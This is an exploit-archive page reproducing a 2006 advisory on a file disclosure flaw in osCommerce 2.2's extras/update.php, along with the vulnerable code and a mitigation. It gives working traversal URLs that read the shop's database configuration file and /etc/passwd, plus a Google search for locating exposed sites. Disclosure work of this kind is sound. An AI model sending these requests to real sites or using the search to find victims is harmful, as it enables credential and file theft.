header-logo
Suggest Exploit
vendor:
osCommerce
by:
rgod
7,5
CVSS
HIGH
Information/Source Code Disclosure
200
CWE
Product Name: osCommerce
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:oscommerce:oscommerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

osCommerce <= 2.2 "extras/" information/source code disclosure

osCommerce is vulnerable to an information/source code disclosure vulnerability. If the 'extras/' folder is placed inside the www path, an attacker can view all files on the target system, including php source code with database details. This is due to the vulnerable code in update.php which allows an attacker to read any file on the system.

Mitigation:

Remove the 'extras/' folder from the web root.
Source

Exploit-DB raw data:

---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------

software site: http://www.oscommerce.com/


if extras/ folder is placed inside the www path, you can see all files on target
system, including php source code with database details, poc:

http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd

this is the vulnerable code in update.php:

...
	include '../mysql.php';
	// if a readme.txt file exists, display it to the user
	if(!$read_me) {
		if(file_exists('readme.txt')) {
			$readme_file = 'readme.txt';
		}
		elseif(file_exists('README')) {
			$readme_file = 'README';
		}
		elseif(file_exists('readme')) {
			$readme_file = 'readme';
		}
		if($readme_file) {
			$readme = file($readme_file);
			print "<CENTER><TABLE BORDER=\"1\" WIDTH=\"75%\" CELLPADDING=\"2\" CELLSPACING=\"0\"><TR BGCOLOR=\"#e7e7cc\"><TD>\n";
			print nl2br(htmlentities(implode($readme, ' ')));
			print "<HR NOSHADE SIZE=\"1\"><CENTER><A HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
			print "</TD></TR></TABLE>\n";
			exit;
		}
	}
...

google search:

inurl:"extras/update.php" intext:mysql.php -display

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
--------------------------------------------------------------------------------

# milw0rm.com [2006-04-14]

Navigation

Suggest Exploit

Services By CQR